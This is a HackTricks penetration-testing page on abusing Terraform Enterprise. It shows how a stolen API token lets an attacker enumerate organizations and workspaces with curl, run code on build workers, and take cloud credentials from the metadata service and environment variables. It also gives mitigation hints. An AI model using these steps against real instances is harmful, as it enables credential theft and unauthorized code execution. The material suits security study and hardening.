Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
****Terraform Enterprise is hashicorp self-hosted distribution of Terraform Cloud. It offers enterprises a private instance of the Terraform Cloud application, with no resource limits and with additional enterprise-grade architectural features like audit logging and SAML single sign-on.
"By default, Terraform Enterprise does not prevent Terraform operations from accessing the instance metadata service, which may contain IAM credentials or other sensitive data" (source)
{% hint style="info" %} While the focus of this article is on targeting the metadata service, it is worth noting that gaining code execution inside a Terraform run may provide other avenues for attack. For example, environment variables could be leaked which may contain sensitive credentials. {% endhint %}
Terraform Cloud runs Terraform on disposable virtual machines in its own cloud infrastructure by default. You can leverage Terraform Cloud Agents to run Terraform on your own isolated, private, or on-premises infrastructure. Remote Terraform execution is sometimes referred to as "remote operations."
Therefore, with an API key to contact Terraform Enterprise it's possible to execute arbitrary code in a container in the cloud.
Terraform API Tokens **** can be identified by the .atlasv1. substring. They are usually located in ~/.terraform.d/ but attacking CI/CD platforms and clouds you might find them in secrets or env variables.
You can use this token to find the Organization:
curl -H "Authorization: Bearer $TERRAFORM_ENTERPRISE_TOKEN" https://<terra_enterprise_inst>/api/v2/organizations | jqand with this info find the Workspace:
curl -H "Authorization: Bearer $TERRAFORM_ENTERPRISE_TOKEN" https://<terra_enterprise_inst>/api/v2/organizations/<org-id>/workspaces | jqNow you need to create a config to communicate with the terraform Enterprise backend. Just get this example and add a hostname with the hostname of the Terraform Enterprise instance:
{% code title="backend_config.tf" %}
terraform {
backend "remote" {
hostname = "{{TFE_HOSTNAME}}"
organization = "{{ORGANIZATION_NAME}}"
workspaces {
name = "{{WORKSPACE_NAME}}"
}
}
}{% endcode %}
Initialise your terraform to use the Terraform Enterprise token
terraform init --backend-config="token=$TERRAFORM_ENTERPRISE_TOKEN"
# Check if it was correctly initialized
terraform state listNow that you have Terraform configured to contact the Enterprise backend you can just follow the section RCE in Terraform **** from:
{% content-ref url="./" %} . {% endcontent-ref %}
As it was previously mentined, Terrafomr Enterprise Infra may run in any machine/cloud provides using agents. Therefore, if you can execute code in this machine, you could gather cloud credentials from the metadata endpoint (IAM, user data...).
Moreover, check the filesystem and environment variables for other potential secrets and API keys.
Also, don't forget to check the network where the machine is located.
{% hint style="info" %}
Many of Terraform Cloud's features rely on remote execution and are not available when using local operations. This includes features like Sentinel policy enforcement, cost estimation, and notifications.
You can disable remote operations for any workspace by changing its Execution Mode to Local. This causes the workspace to act only as a remote backend for Terraform state, with all execution occurring on your own workstations or continuous integration workers. {% endhint %}
{% hint style="info" %} Restrict Terraform Build Worker Metadata Access
By default, Terraform Enterprise does not prevent Terraform operations from accessing the instance metadata service, which may contain IAM credentials or other sensitive data. Refer to AWS, Azure, or Google Cloud documentation for more information on this service. {% endhint %}
- https://developer.hashicorp.com/terraform/enterprise
- https://developer.hashicorp.com/terraform/cloud-docs/run/remote-operations#disabling-remote-operations
- https://hackingthe.cloud/terraform/terraform_enterprise_metadata_service/
- https://developer.hashicorp.com/terraform/enterprise/system-overview/security-model#restrict-terraform-build-worker-metadata-access
Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.